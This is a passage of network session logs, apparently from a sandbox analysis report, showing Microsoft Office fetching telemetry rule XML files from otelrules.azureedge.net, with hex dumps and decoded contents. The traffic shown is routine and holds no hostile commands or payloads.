7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-22 19:35:59 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49767	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:59 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:35:59 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:59 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: f3d0c3d3-f01e-003c-676b-3b8cf0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193559Z-178bfbc474b7cbwqhC1NYC8z4n00000003c0000000006v72 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:35:59 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49765	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:59 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:35:59 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:59 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: d4aa3518-701e-0098-625d-3c395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193559Z-15b8b599d88pxmdghC1TEBux9c00000001yg00000000fs72 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:35:59 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49764	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:59 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:35:59 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:59 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193559Z-178bfbc474bmqmgjhC1NYCy16c00000003bg00000000ts6k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:35:59 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49763	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:59 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:35:59 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:59 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: 44ae66ae-301e-001f-7627-3caa3a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193559Z-15b8b599d88pxmdghC1TEBux9c00000001wg00000000pgqb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:35:59 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49766	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:35:59 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:35:59 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:59 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: 7268c357-001e-0066-5863-3b561e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193559Z-178bfbc474bvjk8shC1NYC83ns000000038000000000d6pv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:35:59 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49768	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:01 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:01 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:01 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193601Z-174c587ffdfdwxdvhC1TEB1c4n00000001qg00000000sbfw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:01 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49769	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:01 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:02 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:01 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 51fbd25c-e01e-0020-5e4d-3cde90000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193601Z-15b8b599d88vp97chC1TEB5pzw00000001tg00000000h6pn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:02 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49772	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:01 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:02 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:01 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: ae573645-101e-008d-516d-3b92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193601Z-174c587ffdfx984chC1TEB676g00000001x0000000008ts2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:02 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:01 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:02 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:02 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: d8f13441-a01e-0021-5e2d-3c814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193602Z-178bfbc474b9xljthC1NYCtw94000000037000000000tp5k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:02 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49770	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:01 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:02 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:02 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: 3e5933f5-801e-00ac-572e-3cfd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193602Z-178bfbc474bw8bwphC1NYC38b4000000033g00000000y5tp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:02 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49773	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:03 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-22 19:36:04 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:36:04 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: 239436ba-d01e-0028-7bd5-3b7896000000 x-ms-version: 2018-03-28 x-azure-ref: 20241122T193604Z-15b8b599d88s6mj9hC1TEBur3000000001u0000000000u8v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-22 19:36:04 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49774	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-22 19:36:03 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
